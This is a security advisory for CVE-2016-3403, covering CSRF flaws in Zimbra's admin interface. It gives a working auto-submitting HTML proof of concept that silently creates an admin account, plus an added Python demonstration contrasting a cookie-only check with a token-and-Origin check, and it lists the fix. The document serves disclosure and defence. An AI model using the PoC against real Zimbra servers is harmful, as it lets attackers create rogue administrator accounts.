CVE-2016-3403 : Multiple CSRF in Zimbra Administration interface

We found multiple CSRF vulnerabilities in the administration interface of Zimbra, which allow an attacker to add, modify and remove admin accounts through the browser of a logged-in administrator.

Description

Multiple CSRF vulnerabilities have been found in the administration
interface of Zimbra. A logged-in administrator who visits an
attacker-controlled page can be made, without any further interaction,
to add, modify or remove admin accounts.

Zimbra nicely credited our efforts.

Vulnerability

Every form in the administration part of Zimbra is vulnerable to CSRF,
because no anti-CSRF token bound to the administrator's session is
required: as the proof of concept below shows, the admin SOAP endpoint
accepts any request that arrives with the authentication cookie the
browser attaches automatically. As a consequence, requests can be forged
by a third-party page and replayed arbitrarily while an administrator is
logged in.

Access Vector: remote

Security Risk: low

Vulnerability: CWE-352

CVSS Base score: 5.8

Proof of Concept

<html>
<body>
<!-- enctype="text/plain" makes the browser send the body as "name=value"
     with no percent-encoding, so the SOAP envelope survives intact. The
     payload is split across the field's name and its value so that the
     "=" the browser inserts between them completes the attribute n="sn". -->
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest"
method="POST">
    <input name='<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header><context xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/>
<session xmlns="" id="1337"/><format xmlns="" type="js"/></context></soap:Header>
<soap:Body><CreateAccountRequest xmlns="urn:zimbraAdmin">
<name xmlns="">itworks@ubuntu.fr</name><password xmlns="">test1234</password>
<a xmlns="" n="zimbraAccountStatus">active</a>
<a xmlns="" n="displayName">ItWorks</a><a xmlns="" n'
        value='"sn">itworks</a><a xmlns="" n="zimbraIsAdminAccount">TRUE</a>
</CreateAccountRequest></soap:Body></soap:Envelope>'/>
</form>
<!-- Auto-submit on page load: the victim's admin authentication cookie is
     attached by the browser and no anti-CSRF token is checked, so the new
     admin account is created without any click. -->
<script>
document.forms[0].submit();
</script>
</body>
</html>
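The following Python script is an added example written for this page; it is not code from the Sysdream advisory or from Zimbra. It serialises the PoC's single form field the way a browser does for enctype="text/plain" and parses the result to show that the body is a well-formed CreateAccountRequest with zimbraIsAdminAccount set to TRUE. It then models the admin SOAP endpoint twice: as the pre-8.7 behaviour the PoC relies on, where the session cookie is the only check, and with the per-session token and Origin check that close CWE-352 as described in the Vulnerability section. The cookie name ADMIN_SESSION, the X-CSRF-Token header, the HMAC secret and the gate functions are illustrative assumptions, not Zimbra's real implementation.

```python
"""Added example (not from the Sysdream advisory or Zimbra): reproduces the
text/plain form trick of the PoC and shows the anti-CSRF check it exploits
the absence of. Cookie/header names and the secret are assumptions."""
import hashlib
import hmac
import xml.etree.ElementTree as ET

SOAP_NS = "http://www.w3.org/2003/05/soap-envelope"
ADMIN_NS = "urn:zimbraAdmin"
ADMIN_ORIGIN = "https://192.168.0.171:7071"      # host used in the PoC
SESSION_SECRET = b"constructed-example-secret"   # assumption: server-side HMAC key

# Field name/value copied from the PoC. The browser joins them with "=",
# which is exactly the character needed to finish the attribute n="sn".
FIELD_NAME = (
    '<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">'
    '<soap:Header><context xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/>'
    '<session xmlns="" id="1337"/><format xmlns="" type="js"/></context>'
    '</soap:Header><soap:Body><CreateAccountRequest xmlns="urn:zimbraAdmin">'
    '<name xmlns="">itworks@ubuntu.fr</name><password xmlns="">test1234</password>'
    '<a xmlns="" n="zimbraAccountStatus">active</a>'
    '<a xmlns="" n="displayName">ItWorks</a><a xmlns="" n'
)
FIELD_VALUE = (
    '"sn">itworks</a><a xmlns="" n="zimbraIsAdminAccount">TRUE</a>'
    '</CreateAccountRequest></soap:Body></soap:Envelope>'
)


def text_plain_body(fields):
    """Serialise form fields as a browser does for enctype="text/plain":
    one "name=value" pair per line, CRLF-terminated, no percent-encoding."""
    return "".join(f"{name}={value}\r\n" for name, value in fields)


def parse_create_account(body):
    """Return (account name, is_admin) for a SOAP CreateAccountRequest,
    or None if the body is not one. Raises on malformed XML."""
    root = ET.fromstring(body)
    req = root.find(f"{{{SOAP_NS}}}Body/{{{ADMIN_NS}}}CreateAccountRequest")
    if req is None:
        return None
    name = req.findtext("name")
    is_admin = any(a.get("n") == "zimbraIsAdminAccount" and a.text == "TRUE"
                   for a in req.findall("a"))
    return name, is_admin


def csrf_token(session_id):
    """Token bound to the session: an HMAC the attacker's page can neither
    compute (no key) nor read (the session cookie is not readable cross-origin)."""
    return hmac.new(SESSION_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def vulnerable_gate(cookies, headers, body):
    """Pre-8.7 behaviour as demonstrated by the PoC: the session cookie,
    which the browser attaches automatically, is the only check."""
    if "ADMIN_SESSION" not in cookies:
        return "401 no session"
    parsed = parse_create_account(body)
    if parsed is None:
        return "400 not a CreateAccountRequest"
    name, is_admin = parsed
    return f"200 created {name} admin={is_admin}"


def hardened_gate(cookies, headers, body):
    """Same endpoint with the missing controls: a per-session CSRF token in a
    custom header (the primary fix) plus an Origin check as defence in depth.
    A cross-site <form> can neither set custom headers nor forge Origin."""
    session = cookies.get("ADMIN_SESSION")
    if session is None:
        return "401 no session"
    origin = headers.get("Origin")
    if origin is not None and origin != ADMIN_ORIGIN:
        return "403 cross-origin request"
    supplied = headers.get("X-CSRF-Token", "")
    if not hmac.compare_digest(supplied, csrf_token(session)):
        return "403 missing or invalid CSRF token"
    return vulnerable_gate(cookies, headers, body)


if __name__ == "__main__":
    body = text_plain_body([(FIELD_NAME, FIELD_VALUE)])
    victim = {"ADMIN_SESSION": "s1"}                # cookie the browser adds
    print(parse_create_account(body))               # ('itworks@ubuntu.fr', True)
    print(vulnerable_gate(victim, {"Origin": "http://attacker.example"}, body))
    print(hardened_gate(victim, {"Origin": "http://attacker.example"}, body))
    print(hardened_gate(victim, {"X-CSRF-Token": csrf_token("s1")}, body))
```

Run it directly to see the three outcomes: the forged body parses as a request for an admin account, the cookie-only gate creates it, and the hardened gate refuses it both for the foreign Origin and for the missing token. One caveat on content type: an HTML form can only send application/x-www-form-urlencoded, multipart/form-data or text/plain, so an endpoint that insisted on a SOAP content type would already break this particular PoC (a cross-origin XHR with that header triggers a CORS preflight). That is not a substitute for the session-bound token, which is what actually ties the request to the administrator's intent.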

Solution

  • Upgrade to version 8.7

Affected versions

  • All versions previous to 8.7

Fixes

Timeline (dd/mm/yyyy)

  • 24/02/2016: Issue reported to Zimbra
  • 24/02/2016: Issue acknowledged

Credits

  • Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail
    -dot- fr)
  • Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)